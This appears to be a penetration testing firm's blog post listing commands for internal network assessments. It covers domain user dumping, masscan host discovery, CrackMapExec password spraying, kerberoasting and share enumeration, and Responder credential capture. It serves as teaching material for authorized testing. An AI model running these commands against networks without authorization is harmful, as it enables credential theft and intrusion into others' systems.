I’ve had a lot of people emailing us asking for some of our common command usage for internal penetration testing engagements. This is a list from some of our internal notes that are great for beginners or administrators looking to gain some information from their own internal network.


Dumping all domain users

ldapdomaindump -u domain\\\\username -p Password <domaincontrollerIP>

Masscan Usage

Discovery on a private IP range. Note: a high rate will crash the network

masscan --ping <ipaddress> --rate=200 -oG filename.txt

//extracting (mostly) just the IP addresses

cat filename.txt | awk '{print $4}' > filename-delimited.txt

Discovering Windows host (hosts with SMB open)

masscan -p445 <ipaddress> --rate-200 -oG filename.txt

CrackMapExec Usage

Discovering Windows host (hosts with SMB open)

crackmapexec smb <ipaddress> 

Resolving list of ip addresses to hostnames

crackmapexec smb filename.txt

Spraying a user account username and pw

crackmapexec smb <ipaddress> -u jsmith -p Password1 -d domain.local

Dumping kerberos tickets

crackmapexec smb <domaincontrollerip> -u jsmith -p Password1 -d domain.local --kerberoasting output.txt

Dumping users

crackmapexec smb <domaincontrollerip> -u jsmith -p Password1 --users

Dumping shares and grepping for the right permissions


crackmapexec smb filename.txt -u jsmith -p Password1 -d domain.local --shares > shares.txt

cat shares.txt | grep --text READ // show all readables shares
cat shares.txt | grep --text WRITE // show all writeable shares

For more usage, visit https://mpgn.gitbook.io/crackmapexec/

Responder/NTLMRelayx Usage

Basic NetNTLM Capture

responder -I eth0 -wF

Plaintext Capture USE WITH CAUTION

responder -I eth0 -Pb

Want to Learn More?

Contact us for our complete command guide!

[contact-form-7 id=”50″ title=”Contact Form”]